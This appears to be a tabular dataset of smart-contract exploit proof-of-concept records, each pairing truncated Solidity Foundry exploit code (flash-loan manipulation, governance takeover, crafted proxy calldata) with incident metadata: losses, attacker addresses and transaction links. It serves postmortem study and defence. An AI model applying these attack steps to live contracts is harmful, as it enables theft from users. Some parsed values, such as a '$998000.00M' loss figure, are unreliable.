console.log("DEI balance f... | true | Unknown | 2.81 | low | DEI Exploit (2023-05) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~7.5M USD$
// Attacker : https://bscscan.com/address/0xcbc0d0c1049eb011d7c7cfc4ff556d281f0afebb
// Attack Contract : https://bscscan.com/address/0x51873a0b615a51115f2cfb... | exploit_poc | BabyDogeCoin | 2023-05 | BabyDogeCoin_exp.sol | flash_loan | ffc98cc92e120cf9 | 2026-01-07T10:59:16.522796 | postmortems | bsc | 28,593,354 | ~7.5M USD$ | 7,500,000 | https://bscscan.com/address/0xcbc0d0c1049eb011d7c7cfc4ff556d281f0afebb | https://bscscan.com/address/0x51873a0b615a51115f2cfbc2e24d9db4bfa2e6e2 | https://bscscan.com/address/0xc748673057861a797275cd8a068abb95a902e8de | https://bscscan.com/tx/0x098e7394a1733320e0887f0de22b18f5c71ee18d48a0f6d30c76890fb5c85375 | null | https://twitter.com/Phalcon_xyz/status/1662744426475831298 | true | true | true | critical | ~7.5M USD$ | flash-loan | false | ~7.5M USD$ | https://bscscan.com/address/0xcbc0d0c1049eb011d7c7cfc4ff556d281f0afebb | https://bscscan.com/address/0x51873a0b615a51115f2cfbc2e24d9db4bfa2e6e2 | https://bscscan.com/address/0xc748673057861a797275cd8a068abb95a902e8de | https://bscscan.com/tx/0x098e7394a1733320e0887f0de22b18f5c71ee18d48a0f6d30c76890fb5c85375 | https://twitter.com/Phalcon_xyz/status/1662744426475831298 | $7.50M | 7.68 | medium | BabyDogeCoin Exploit (2023-05) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~111K USD$
// Attacker : https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671
// Attack Contract : https://etherscan.io/address/0x7c28e0977f72c5d08d5e... | exploit_poc | ERC20TokenBank | 2023-05 | ERC20TokenBank_exp.sol | null | abbe2134cca4f66d | 2026-01-07T10:59:16.522851 | postmortems | ethereum | 17,376,906 | ~111K USD$ | 111,000 | https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671 | https://etherscan.io/address/0x7c28e0977f72c5d08d5e1ac7d52a34db378282b3 | https://etherscan.io/address/0x765b8d7cd8ff304f796f4b6fb1bcf78698333f6d | https://etherscan.io/tx/0x578a195e05f04b19fd8af6358dc6407aa1add87c3167f053beb990d6b4735f26 | null | https://twitter.com/BlockSecTeam/status/1663810037788311561 | true | true | false | high | ~111K USD$ | unknown | false | ~111K USD$ | https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671 | https://etherscan.io/address/0x7c28e0977f72c5d08d5e1ac7d52a34db378282b3 | https://etherscan.io/address/0x765b8d7cd8ff304f796f4b6fb1bcf78698333f6d | https://etherscan.io/tx/0x578a195e05f04b19fd8af6358dc6407aa1add87c3167f053beb990d6b4735f26 | https://twitter.com/BlockSecTeam/status/1663810037788311561 | $111.0K | 5.29 | medium | ERC20TokenBank Exploit (2023-05) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
... | exploit_poc | BuildF | 2022-02 | BuildF_exp.sol | null | 3a0e357ab6c8eb3b | 2026-01-07T10:59:16.522897 | postmortems | unknown | 14,235,712 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function test() public {
cheat.prank(0x562680a4dC50ed2f14d75BF31f494cfE0b8D10a1);
build.transfer(address(this), 101_529_401_443_281_484_977);
emit log_named_uint("Befre proposing, BUILD balance of attacker:", build.balanceOf(address(this)));
build.approve(address(BuildGovernance), type(u... | true | Unknown | 3.24 | low | BuildF Exploit (2022-02) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface SushiRouter {
function swapExactTokensForTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
... | exploit_poc | Meter | 2022-02 | Meter_exp.sol | null | 1fa45f12f9bb35c6 | 2026-01-07T10:59:16.522940 | postmortems | unknown | 1,442,490 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
cheats.startPrank(attacker);
address[] memory path = new address[](2);
path[0] = 0x8d3d13cac607B7297Ff61A5E1E71072758AF4D01;
path[1] = 0x639A647fbe20b6c8ac19E48E2de44ea792c62c5C;
// sushiSwapRouter.call(hex"38ed173900000000000000000000000000000000... | true | Unknown | 3.08 | low | Meter Exploit (2022-02) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
@KeyInfo
- Total Lost: 639,222 $USDT
- Attacker: https://etherscan.io/address/0xb19b7f59c08ea447f82b587c058ecbf5fde9c299
- Attack Contract: https://etherscan.io/address/0x6653d9... | exploit_poc | TecraSpace | 2022-02 | TecraSpace_exp.sol | null | fd8bccd1b1173d92 | 2026-01-07T10:59:16.522986 | postmortems | ethereum | 14,139,082 | 639,222 $USDT | 639 | https://etherscan.io/address/0xb19b7f59c08ea447f82b587c058ecbf5fde9c299 | https://etherscan.io/address/0x6653d9bcbc28fc5a2f5fb5650af8f2b2e1695a15 | null | https://app.blocksec.com/explorer/tx/eth/0x81e9918e248d14d78ff7b697355fd9f456c6d7881486ed14fdfb69db16631154 | null | null | true | false | false | low | 639,222 $USDT | unknown | false | 639,222 $USDT | https://etherscan.io/address/0xb19b7f59c08ea447f82b587c058ecbf5fde9c299 | https://etherscan.io/address/0x6653d9bcbc28fc5a2f5fb5650af8f2b2e1695a15 | https://app.blocksec.com/explorer/tx/eth/0x81e9918e248d14d78ff7b697355fd9f456c6d7881486ed14fdfb69db16631154 | $639 | 4.73 | low | TecraSpace Exploit (2022-02) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
ILand Land = ILand(0x50f5474724e0Ee42D9a4e711ccFB275809Fd6d4a);
address ... | exploit_poc | Sandbox | 2022-02 | Sandbox_exp.sol | null | c8ab3a6d741f2de8 | 2026-01-07T10:59:16.523031 | postmortems | unknown | 14,163,041 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
cheats.startPrank(0x6FB0B915D0e10c3B2ae42a5DD879c3D995377A2C);
console.log("Before exploiting, victim owned NFT:", Land._numNFTPerAddress(victim)); // 2762 is the number of NFTs in the victim's account.
for (uint256 i = 0; i < 100; i++) {
// let's try ... | true | Unknown | 2.59 | low | Sandbox Exploit (2022-02) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/optimism/0x4ec3061724ca9f0b8d400866dd83b92647ad8c943a1c0ae9ae6c9bd1ef789417
// Profit : ~413K USD,but i get more
// REASON : Bussiness Logic Flaw
in... | exploit_poc | MO | 2024-03 | MO_exp.sol | null | af754af64b637759 | 2026-01-07T10:59:16.523075 | postmortems | unknown | 117,395,511 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.7 | low | MO Exploit (2024-03) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Attacker : https://bscscan.com/address/0xff61Ba33Ed51322BB716EAb4137Adf985644b94d
// Attack Contract : https://bscscan.com/address/0x0edf13f6bd033f0f267d46c6e9dff9c7190e0fa0
// Attack Tx : http... | exploit_poc | ALP | 2024-03 | ALP_exp.sol | null | 51844aaf72e73151 | 2026-01-07T10:59:16.523128 | postmortems | bsc | 36,727,073 | null | null | https://bscscan.com/address/0xff61Ba33Ed51322BB716EAb4137Adf985644b94d | https://bscscan.com/address/0x0edf13f6bd033f0f267d46c6e9dff9c7190e0fa0 | null | https://app.blocksec.com/explorer/tx/bsc/0x9983ca8eaee9ee69629f74537eaf031272af75f1e5a7725911d8b06df17c67ca | null | null | false | false | false | medium | null | unknown | false | https://bscscan.com/address/0xff61Ba33Ed51322BB716EAb4137Adf985644b94d | https://bscscan.com/address/0x0edf13f6bd033f0f267d46c6e9dff9c7190e0fa0 | https://app.blocksec.com/explorer/tx/bsc/0x9983ca8eaee9ee69629f74537eaf031272af75f1e5a7725911d8b06df17c67ca | Unknown | 3.48 | low | ALP Exploit (2024-03) | false | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~54 ETH
// Attacker : https://etherscan.io/address/0x3fA19214705BC82cE4b898205157472A79D026BE
// Attack Contract : https://etherscan.io/address/0xa8b45dEE8306b520465f1f8... | exploit_poc | Juice | 2024-03 | Juice_exp.sol | null | e8f3ac6f4e4c71af | 2026-01-07T10:59:16.523177 | postmortems | ethereum | null | ~54 ETH | 54 | https://etherscan.io/address/0x3fA19214705BC82cE4b898205157472A79D026BE | https://etherscan.io/address/0xa8b45dEE8306b520465f1f8da7E11CD8cFD1bBc4 | https://etherscan.io/address/0x8584ddbd1e28bca4bc6fb96bafe39f850301940e | https://etherscan.io/tx/0xc9b2cbc1437bbcd8c328b6d7cdbdae33d7d2a9ef07eca18b4922aac0430991e7 | null | null | true | false | false | low | ~54 ETH | unknown | function testExploit() public {
emit log_named_decimal_uint("[Start] Attacker ETH balance before exploit", address(this).balance, 18);
//stake 0.5 ETH
ETHtoJUICE(0.5 ether);
JUICE.approve(address(JuiceStaking), type(uint256).max);
JuiceStaking.stake(JUICE.balanceOf(address(this)... | true | ~54 ETH | https://etherscan.io/address/0x3fA19214705BC82cE4b898205157472A79D026BE | https://etherscan.io/address/0xa8b45dEE8306b520465f1f8da7E11CD8cFD1bBc4 | https://etherscan.io/address/0x8584ddbd1e28bca4bc6fb96bafe39f850301940e | https://etherscan.io/tx/0xc9b2cbc1437bbcd8c328b6d7cdbdae33d7d2a9ef07eca18b4922aac0430991e7 | $54 | 7.35 | medium | Juice Exploit (2024-03) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$223K
// Attacker : https://bscscan.com/address/0x2c42824ef89d6efa7847d3997266b62599560a26
// Attack Contract : https://bscscan.com/address/0x0bd0d9ba4f52db225b265c3cff... | exploit_poc | ZongZi | 2024-03 | ZongZi_exp.sol | null | b7cb0879ce04dffb | 2026-01-07T10:59:16.523229 | postmortems | bsc | null | ~$223K | 223,000 | https://bscscan.com/address/0x2c42824ef89d6efa7847d3997266b62599560a26 | https://bscscan.com/address/0x0bd0d9ba4f52db225b265c3cffa7bc4a418d22a9 | null | null | null | null | true | true | false | high | ~$223K | unknown | function testExploit() public {
emit log_named_decimal_uint("Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), 18);
uint256 pairWBNBBalance = WBNB.balanceOf(address(WBNB_ZONGZI));
uint256 multiplier = uint256(vm.load(attackContract, bytes32(uint256(9))));
uint256 am... | true | ~$223K | https://bscscan.com/address/0x2c42824ef89d6efa7847d3997266b62599560a26 | https://bscscan.com/address/0x0bd0d9ba4f52db225b265c3cffa7bc4a418d22a9 | $223.0K | 6.43 | medium | ZongZi Exploit (2024-03) | true | false | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$1.24K (2.13 BNB)
// Attacker : https://bscscan.com/address/0x52e38d496f8d712394d5ed55e4d4cdd21f1957de
// Attack Contract : https://bscscan.co... | exploit_poc | ETHFIN | 2024-03 | ETHFIN_exp.sol | null | 4320ab2191c130da | 2026-01-07T10:59:16.523290 | postmortems | bsc | 37,400,485 | ~$1.24K (2.13 BNB) | 1,240 | https://bscscan.com/address/0x52e38d496f8d712394d5ed55e4d4cdd21f1957de | https://bscscan.com/address/0x11bfd986299bb0d5666536e361f312198e882642 | https://bscscan.com/address/0x17bd2e09fa4585c15749f40bb32a6e3db58522ba | https://bscscan.com/tx/0xfe031685d84f3bae1785f5b2bd0ed480b87815c3f23ce6ced73b8573b7e367c6 | null | null | true | true | false | low | ~$1.24K (2.13 BNB) | unknown | false | ~$1.24K (2.13 BNB) | https://bscscan.com/address/0x52e38d496f8d712394d5ed55e4d4cdd21f1957de | https://bscscan.com/address/0x11bfd986299bb0d5666536e361f312198e882642 | https://bscscan.com/address/0x17bd2e09fa4585c15749f40bb32a6e3db58522ba | https://bscscan.com/tx/0xfe031685d84f3bae1785f5b2bd0ed480b87815c3f23ce6ced73b8573b7e367c6 | $1.2K | 6.49 | medium | ETHFIN Exploit (2024-03) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : 5.06 ETH
// TX : https://app.blocksec.com/explorer/tx/eth/0x4019890fe5a5bd527cd3b9f7ee6d94e55b331709b703317860d028745e33a8ca?line=4
// Attacker : https://etherscan.io/a... | exploit_poc | BBT | 2024-03 | BBT_exp.sol | null | f01db2ce9c09f042 | 2026-01-07T10:59:16.523353 | postmortems | ethereum | 19,417,822 | 5.06 ETH | 5.06 | https://etherscan.io/address/0xc9a5643ed8e4cd68d16fe779d378c0e8e7225a54 | https://etherscan.io/address/0xf5610cf8c27454b6d7c86fccf1830734501425c5 | null | null | null | null | true | false | false | low | 5.06 ETH | unknown | function attack() public {
create_contract(0);
} | true | https://etherscan.io/address/0xc9a5643ed8e4cd68d16fe779d378c0e8e7225a54 | https://etherscan.io/address/0xf5610cf8c27454b6d7c86fccf1830734501425c5 | $5 | 6.51 | medium | BBT Exploit (2024-03) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$150K
// Attacker : https://bscscan.com/address/0xff1db040e4f2a44305e28f8de728dabff58f01e1
// Attack Contract : https://bscscan.com/address/0x1a8eb8eca01819b695637c55c1... | exploit_poc | TGBS | 2024-03 | TGBS_exp.sol | flash_loan | 7eb8887abeb4e50c | 2026-01-07T10:59:16.523401 | postmortems | bsc | 36,725,819 | ~$150K | 150,000 | https://bscscan.com/address/0xff1db040e4f2a44305e28f8de728dabff58f01e1 | https://bscscan.com/address/0x1a8eb8eca01819b695637c55c1707f9497b51cd9 | null | https://app.blocksec.com/explorer/tx/bsc/0xa0408770d158af99a10c60474d6433f4c20f3052e54423f4e590321341d4f2a4 | null | null | true | true | true | high | ~$150K | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals()
);
uint256 baseAmount = WBNB.balanceOf(address(DPPOracle));
DPPOracle.flashLoan(baseAmount, 0, address(this), abi.encodePacked(... | true | ~$150K | https://bscscan.com/address/0xff1db040e4f2a44305e28f8de728dabff58f01e1 | https://bscscan.com/address/0x1a8eb8eca01819b695637c55c1707f9497b51cd9 | https://app.blocksec.com/explorer/tx/bsc/0xa0408770d158af99a10c60474d6433f4c20f3052e54423f4e590321341d4f2a4 | $150.0K | 7.63 | medium | TGBS Exploit (2024-03) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0xe8b0131fa14d0a96327f6b5690159ffa7650d66376db87366ba78d91f17cd677
// GUY : https://twitter.com/Phalcon_xyz/status/1771728823534375249
// Profit : ... | exploit_poc | ARK | 2024-03 | ARK_exp.sol | null | 660e05babc2a2627 | 2026-01-07T10:59:16.523447 | postmortems | unknown | 37,221,235 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.06 | low | ARK Exploit (2024-03) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~0.2 $BNB
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
// Attack Contract : https://bscscan.com/address/0x132e1ea5db918dae00eef685b845c409a83dfa82
// Vulnerable Contract : https://bscscan.... | exploit_poc | Binemon | 2024-03 | Binemon_exp.sol | null | 67854cb456bf40e3 | 2026-01-07T10:59:16.523492 | postmortems | bsc | 36,864,395 | ~0.2 $BNB | 0.2 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0x132e1ea5db918dae00eef685b845c409a83dfa82 | https://bscscan.com/address/0xe56842ed550ff2794f010738554db45e60730371 | https://app.blocksec.com/explorer/tx/bsc/0x1999bb5c11a8d8bfa7620fc5cc37f5bc59c1a99d7a9250a8d6076c93bbdbeb5f | null | null | true | false | false | low | ~0.2 $BNB | unknown | function testExploit() public {
WBNB.approve(address(Router), type(uint256).max);
BIN.approve(address(Router), type(uint256).max);
deal(address(WBNB), address(this), 1 ether);
deal(address(WBNB), address(otherUser), 10 ether);
emit log_named_decimal_uint("Attacker WBNB balance be... | true | ~0.2 $BNB | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0x132e1ea5db918dae00eef685b845c409a83dfa82 | https://bscscan.com/address/0xe56842ed550ff2794f010738554db45e60730371 | https://app.blocksec.com/explorer/tx/bsc/0x1999bb5c11a8d8bfa7620fc5cc37f5bc59c1a99d7a9250a8d6076c93bbdbeb5f | $0 | 7.53 | medium | Binemon Exploit (2024-03) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~8M
// Attacker : https://arbiscan.io/address/0x9961190b258897bca7a12b8f37f415e689d281c4
// Attack Contract : https://arbiscan.io/address/0xc3910dca5d3931f4a10261b8f58e1... | exploit_poc | Woofi | 2024-03 | Woofi_exp.sol | flash_loan | 9ee9e42b4ff2ae3a | 2026-01-07T10:59:16.523536 | postmortems | arbitrum | 187,381,784 | ~8M | 8,000,000 | https://arbiscan.io/address/0x9961190b258897bca7a12b8f37f415e689d281c4 | https://arbiscan.io/address/0xc3910dca5d3931f4a10261b8f58e1a19a13e0203 | https://arbiscan.io/address/0xeff23b4be1091b53205e35f3afcd9c7182bf3062 | https://arbiscan.io/tx/0x57e555328b7def90e1fc2a0f7aa6df8d601a8f15803800a5aaf0a20382f21fbd | null | null | true | true | true | critical | ~8M | flash-loan | function testExploit() public {
WOO.approve(WooPPV2, type(uint256).max);
WOO.approve(Silo, type(uint256).max);
USDCe.approve(WooPPV2, type(uint256).max);
USDCe.approve(Silo, type(uint256).max);
uni_flash_amount = USDCe.balanceOf(Univ3pool) - 10_000_000_000;
IUniswapV3Fla... | true | ~8M | https://arbiscan.io/address/0x9961190b258897bca7a12b8f37f415e689d281c4 | https://arbiscan.io/address/0xc3910dca5d3931f4a10261b8f58e1a19a13e0203 | https://arbiscan.io/address/0xeff23b4be1091b53205e35f3afcd9c7182bf3062 | https://arbiscan.io/tx/0x57e555328b7def90e1fc2a0f7aa6df8d601a8f15803800a5aaf0a20382f21fbd | $8.00M | 10 | high | Woofi Exploit (2024-03) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.19;
import {Test, console2} from "forge-std/Test.sol";
// @KeyInfo - Total Lost: ~$11M
// Attacker: 0x7e39e3b3ff7adef2613d5cc49558eab74b9a4202
// Attack Contract: 0xd996073019c74b2fb94ead236e32032405bc027c
// Vulnerable Contract: 0xcc7218100da61441905e0c3277... | exploit_poc | Prisma | 2024-03 | Prisma_exp.sol | flash_loan | b538ed29b4db99c5 | 2026-01-07T10:59:16.523599 | postmortems | ethereum | null | ~$11M | 11,000,000 | null | null | null | https://etherscan.io/tx/0x00c503b595946bccaea3d58025b5f9b3726177bbdc9674e634244135282116c7 | null | null | true | false | true | critical | ~$11M | flash-loan | function test_exploit() public {
uint256 price = priceFeed.fetchPrice(wstETH);
console2.log("Price Feed Price: ", price);
// start with ~1800 mkUSD
deal(address(mkUSD), address(this), 1_800_000_022_022_732_637);
console2.log("Attacker start with ~1800 mkUSD: ", IERC20(mkUSD).ba... | true | ~$11M | https://etherscan.io/tx/0x00c503b595946bccaea3d58025b5f9b3726177bbdc9674e634244135282116c7 | $11.00M | 9 | high | Prisma Exploit (2024-03) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~998B(cgt token)
// TX : https://app.blocksec.com/explorer/tx/eth/0x4ff4028b03c3df468197358b99f5160e5709e7fce3884cc8ce818856d058e106
// Attacker : https://etherscan.io/... | exploit_poc | CGT | 2024-03 | CGT_exp.sol | null | bb92817f75ddfcf5 | 2026-01-07T10:59:16.523688 | postmortems | ethereum | 19,498,910 | ~998B(cgt token) | 998,000,000,000 | https://etherscan.io/address/0xdaaa6294c47b5743bdafe0613d1926ee27ae8cf5 | https://etherscan.io/address/0x1e791527aea32cddbd7ceb7f04612db536816545 | null | null | null | null | true | false | false | critical | ~998B(cgt token) | unknown | function attack() public {
cgt.approve(address(chief), type(uint256).max);
chief.lock(20 ether);
address[] memory yays = new address[](1);
yays[0] = address(this);
chief.vote(yays);
chief.lift(address(this));
spell = new Spell();
address spelladdr = addres... | true | https://etherscan.io/address/0xdaaa6294c47b5743bdafe0613d1926ee27ae8cf5 | https://etherscan.io/address/0x1e791527aea32cddbd7ceb7f04612db536816545 | $998000.00M | 7 | medium | CGT Exploit (2024-03) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~340K
// Attacker : https://arbiscan.io/address/0x851aa754c39bf23cdaac2025367514dfd7530418
// Attack Contract 1: https://arbiscan.io/address/0x3e52c217a902002ca296fe6769... | exploit_poc | LavaLending | 2024-03 | LavaLending_exp.sol | flash_loan | 74607b27e3c86e3d | 2026-01-07T10:59:16.523765 | postmortems | arbitrum | 195,240,642 | ~340K | 340,000 | https://arbiscan.io/address/0x851aa754c39bf23cdaac2025367514dfd7530418 | null | https://arbiscan.io/address/0x7746872c6892bcfb4254390283719f2bd2d4da76#code | https://app.blocksec.com/explorer/tx/arbitrum/0xcb1a2f5eeb1a767ea5ccbc3665351fadc1af135d12a38c504f8f6eb997e9e603 | null | null | true | true | true | high | ~340K | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter USDCe balance before attack", USDCe.balanceOf(address(this)), USDCe.decimals()
);
emit log_named_decimal_uint(
"Exploiter wstEth balance before attack", wstETH.balanceOf(address(this)), wstETH.decima... | true | ~340K | https://arbiscan.io/address/0x851aa754c39bf23cdaac2025367514dfd7530418 | https://arbiscan.io/address/0x7746872c6892bcfb4254390283719f2bd2d4da76#code | https://app.blocksec.com/explorer/tx/arbitrum/0xcb1a2f5eeb1a767ea5ccbc3665351fadc1af135d12a38c504f8f6eb997e9e603 | $340.0K | 10 | high | LavaLending Exploit (2024-03) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~2M USD$
// Attacker : https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df
// Vulnerable Contract : (Unizen: Trade Aggregator Proxy) https://etherscan... | exploit_poc | UnizenIO | 2024-03 | UnizenIO_exp.sol | null | 03c8e5d56ce74589 | 2026-01-07T10:59:16.523861 | postmortems | ethereum | 19,393,769 | ~2M USD$ | 2,000,000 | https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df | null | null | https://app.blocksec.com/explorer/tx/eth/0x923d1d63a1165ebd3521516f6d22d015f2e1b4b22d5dc954152b6c089c765fcd | null | null | true | true | false | critical | ~2M USD$ | unknown | function testExploit() public {
vm.startPrank(attacker);
aggregator_proxy.call{value: 1}(
hex"1ef29a02000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000001a00000000000000000000000002ad8aed847e8d4d3da52aabb7d0f5c25729d10... | true | ~2M USD$ | https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df | https://app.blocksec.com/explorer/tx/eth/0x923d1d63a1165ebd3521516f6d22d015f2e1b4b22d5dc954152b6c089c765fcd | $2.00M | 6.66 | medium | UnizenIO Exploit (2024-03) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost: $4.8M
// Attacker: 0x6a89a8C67B5066D59BF4D81d59f70C3976faCd0A
// Attack Contract: 0xDed85d83Bf06069c0bD5AA792234b5015D5410A9
// Vulnerable Contract: 0xdfDCdbC789b56F99B0d0692... | exploit_poc | SSS | 2024-03 | SSS_exp.sol | flash_loan | 10d28233711e207a | 2026-01-07T10:59:16.523903 | postmortems | unknown | 1,110,245 | $4.8M | 4,800,000 | null | null | null | https://blastscan.io/tx/0x62e6b906bb5aafdc57c72cd13e20a18d2de3a4a757cd2f24fde6003ce5c9f2c6 | null | null | true | false | true | critical | $4.8M | flash-loan | function testExploit() public balanceLog {
//Emulate flashloan here with deal
vm.deal(address(this), 0);
vm.deal(address(this), ethFlashAmt);
WETH.deposit{value: ethFlashAmt}();
//Buy 1 eth of tokens
ROUTER_V2.swapExactTokensForTokensSupportingFeeOnTransferTokens(
... | true | $4.8M | https://blastscan.io/tx/0x62e6b906bb5aafdc57c72cd13e20a18d2de3a4a757cd2f24fde6003ce5c9f2c6 | $4.80M | 7.83 | medium | SSS Exploit (2024-03) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$24K
// Whitehat : https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a
// Whitehat Contract : https://etherscan.io/address/0x6980a47bee930a4584b09ee... | exploit_poc | Paraswap | 2024-03 | Paraswap_exp.sol | null | 0f5dbc7ff3383838 | 2026-01-07T10:59:16.523956 | postmortems | ethereum | 19,470,560 | ~$24K | 24,000 | null | null | null | null | null | null | true | true | false | medium | ~$24K | unknown | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals()
);
emit log_named_decimal_uint("Victim OPSEC balance before attack", OPSEC.balanceOf(from), OPSEC.decimals());
emit log_named_... | true | ~$24K | $24.0K | 5.66 | medium | Paraswap Exploit (2024-03) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$57K
// Attacker : https://etherscan.io/address/0x096f0f03e4be68d7e6dd39b22a3846b8ce9849a3
// Attack Contract : https://etherscan.io/address/0xcc5159b5538268f45afda7b57... | exploit_poc | GHT | 2024-03 | GHT_exp.sol | null | 75358c2c10043808 | 2026-01-07T10:59:16.524004 | postmortems | ethereum | null | ~$57K | 57,000 | https://etherscan.io/address/0x096f0f03e4be68d7e6dd39b22a3846b8ce9849a3 | https://etherscan.io/address/0xcc5159b5538268f45afda7b5756fa8769ce3e21f | null | https://app.blocksec.com/explorer/tx/eth/0xd17266bcdf30cbcbd7d0b5a006f43141981aeee2e1f860f68c9a1805ecacbc68?line=3 | null | null | true | false | false | medium | ~$57K | unknown | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals()
);
uint256 amount = GHT.balanceOf(address(WETH_GHT));
GHT.transferFrom(address(WETH_GHT), address(GHT), amount - 1);
WET... | true | ~$57K | https://etherscan.io/address/0x096f0f03e4be68d7e6dd39b22a3846b8ce9849a3 | https://etherscan.io/address/0xcc5159b5538268f45afda7b5756fa8769ce3e21f | https://app.blocksec.com/explorer/tx/eth/0xd17266bcdf30cbcbd7d0b5a006f43141981aeee2e1f860f68c9a1805ecacbc68?line=3 | $57.0K | 6.39 | medium | GHT Exploit (2024-03) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$2M
// Attacker : https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df
